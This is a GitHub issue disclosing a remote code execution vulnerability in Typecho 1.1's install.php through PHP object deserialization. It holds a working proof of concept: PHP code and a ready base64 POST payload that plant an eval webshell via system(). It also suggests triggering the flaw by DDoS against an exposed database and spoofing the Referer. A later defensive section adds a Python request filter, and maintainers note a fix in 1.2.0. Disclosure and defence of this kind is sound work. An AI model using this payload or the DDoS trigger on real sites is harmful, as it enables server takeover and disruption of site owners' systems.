
the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability #1523

Closed
youyou-pm10 opened this issue Jan 12, 2023 · 2 comments


@youyou-pm10

List of vulnerable paths

Vulnerable path /install.php
Lines 60-69 of "install.php" catch the error but do nothing, so the "exit" on line 65 is bypassed.
code.png
It occurs when the network is unstable; we can create the situation by DDoS against a database exposed to the public network, or just wait for it.
We can simulate this situation by breakpoint debugging. Set the breakpoint on line 60, then cut off the connection with the database (such as PhpStorm + phpStudy and so on).
net.png
debug.png
Lines 74-87 of "install.php": we can fake the referer to bypass the second "exit". We can set the referer to "http://localhost/".
reffer.png
Line 291 of "install.php" has a function "unserialize"; it can be exploited maliciously.
The parameters come from line 83 of "/var/Typecho/Cookie.php".
unserialize0.png
Line 420 of "install.php" triggers the function "__toString".
Line 223 of "/var/Typecho/Feed.php" has the function "__toString".
toString1.png
toString2.png
toString3.png
Line 290 of "/var/Typecho/Feed.php" triggers the function "__get".
Line 270 of "/var/Typecho/Request.php" has the function "__get".
get1.png
get2.png
get3.png
We can exploit the function "call_user_func" to get remote code execution.

Vulnerability exploitation process:

It occurs when the network is unstable; we can create the situation by DDoS against a database exposed to the public network, or just wait for it. Of course, we can send network packets repeatedly to wait for it.
ok.png
"ok" will be sent if it succeeds, because of the POC. Then test the webshell.
info.png

POC code:

<?php
class Typecho_Request{
    private $_params= array('screenName'=> 'php -r "echo \'ok\';file_put_contents(\'cmd.php\', \'<?php eval($_POST[\"youyou\"]); ?>\');"');
    private $_filter= array('system');
}
class Typecho_Feed{
    private $_items=array();
    private $_type='ATOM 1.0';
    public function __construct()
    {
        $items['author']=new Typecho_Request();
        $this->_items[0]=$items;
    }
}
$config['prefix'] = new Typecho_Feed();
$payload = base64_encode(serialize($config));
echo $payload;
URL: http://localhost/install.php?start=1
POST Data: delete=true&__typecho_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0=
Referer: http://localhost/
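An added defensive example, written for this page and not code from the issue or from Typecho: the root cause described above is `unserialize()` running on a base64-encoded `__typecho_config` value the client controls, with the magic methods of the resulting objects doing the rest. Because a legitimate install config is a plain PHP array, a WAF rule or a log-review script can decode the parameter and reject the request as soon as an object token (`O:` or `C:`) appears, without ever handing the data to PHP. The parser below walks the serialize() format byte by byte, so it is not fooled by a string whose text merely looks like an object token, and it handles the NUL-prefixed private property names that appear in serialized objects. `assess_request`, `php_unserialize` and the sample bodies are constructed for this example.

```python
import base64
import binascii
from collections import namedtuple
from urllib.parse import parse_qs

# Inert stand-in for an O:/C: token: keeps the class name, runs no PHP code.
PhpObject = namedtuple("PhpObject", "cls props")


def php_unserialize(data: bytes):
    """Parse PHP serialize() bytes without instantiating anything; returns
    (value, classes) where classes lists every O:/C: class name seen.  Lengths
    are byte counts, so private names like b"\\0Cls\\0prop" parse; r:/R: refs are rejected."""
    classes, pos = [], 0

    def expect(tok):
        nonlocal pos
        if data[pos:pos + len(tok)] != tok:
            raise ValueError(f"expected {tok!r} at offset {pos}")
        pos += len(tok)

    def read_until(delim):
        nonlocal pos
        end = data.find(delim, pos)
        if end < 0:
            raise ValueError(f"missing {delim!r} after offset {pos}")
        tok, pos = data[pos:end], end + 1
        return tok

    def read_counted(open_ch, close_ch):  # <len>:<open><len bytes><close>
        nonlocal pos
        length = int(read_until(b":"))
        expect(open_ch)
        chunk = data[pos:pos + length]
        if len(chunk) != length:
            raise ValueError("declared length runs past end of data")
        pos += length
        expect(close_ch)
        return chunk

    def read_pairs():  # <count>:{ key value ... } for arrays and properties
        count = int(read_until(b":"))
        expect(b"{")
        out = {}
        for _ in range(count):
            key = parse()
            out[key] = parse()
        expect(b"}")
        return out

    def parse():
        nonlocal pos
        tag, pos = data[pos:pos + 1], pos + 1
        if tag == b"N":
            expect(b";")
            return None
        if tag in (b"b", b"i", b"d"):
            expect(b":")
            raw = read_until(b";")
            return raw == b"1" if tag == b"b" else int(raw) if tag == b"i" else float(raw)
        if tag == b"s":
            expect(b":")
            s = read_counted(b'"', b'"')
            expect(b";")
            return s.decode("latin-1")
        if tag == b"a":
            expect(b":")
            return read_pairs()
        if tag in (b"O", b"C"):
            expect(b":")
            cls = read_counted(b'"', b'"').decode("latin-1")
            classes.append(cls)
            expect(b":")
            return PhpObject(cls, read_pairs() if tag == b"O" else read_counted(b"{", b"}"))
        raise ValueError(f"unsupported token {tag!r} at offset {pos - 1}")

    return parse(), classes


def assess_request(body: str, param: str = "__typecho_config"):
    """Return {"present", "classes", "verdict"}: verdict is "block" when the
    parameter holds a PHP object or malformed data, else "allow" (a real
    install config is a plain array)."""
    values = parse_qs(body, keep_blank_values=True).get(param, [])
    result = {"present": bool(values), "classes": [], "verdict": "allow"}
    for raw in values:
        try:  # an unencoded '+' in the base64 arrives as a space; restore it
            _, classes = php_unserialize(base64.b64decode(raw.replace(" ", "+"), validate=True))
        except (binascii.Error, ValueError):
            classes = ["<malformed>"]
        result["classes"].extend(classes)
        result["verdict"] = "block" if result["classes"] else "allow"
    return result


# Constructed sample bodies for this example (not the payload from the report).
ARRAY_ONLY = base64.b64encode(b'a:1:{s:6:"prefix";s:8:"typecho_";}').decode()
WITH_OBJECT = base64.b64encode(b'a:1:{s:6:"prefix";O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}}').decode()
# String whose *content* mimics an object token: a regex on O:\d+:" would misfire here.
LOOKALIKE = base64.b64encode(b'a:1:{s:1:"k";s:8:"O:1:"x":";}').decode()
```

`assess_request("delete=true&__typecho_config=" + WITH_OBJECT)` returns verdict `block` with `classes == ["stdClass"]`, while `ARRAY_ONLY` and `LOOKALIKE` return `allow`. The application-side fix is the one PHP itself offers: `unserialize($data, ['allowed_classes' => false])` (PHP 7.0+) turns every object token into `__PHP_Incomplete_Class`, so no `__toString`, `__get`, `__wakeup` or `__destruct` of an application class can fire; better still, a config array should travel as JSON or in a signed cookie rather than as serialize() output.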
@myaijarvis

very good!

@joyqi
Member

joyqi commented Jan 12, 2023

We have fixed this issue in 1.2.0.

@joyqi joyqi closed this as completed Jan 13, 2023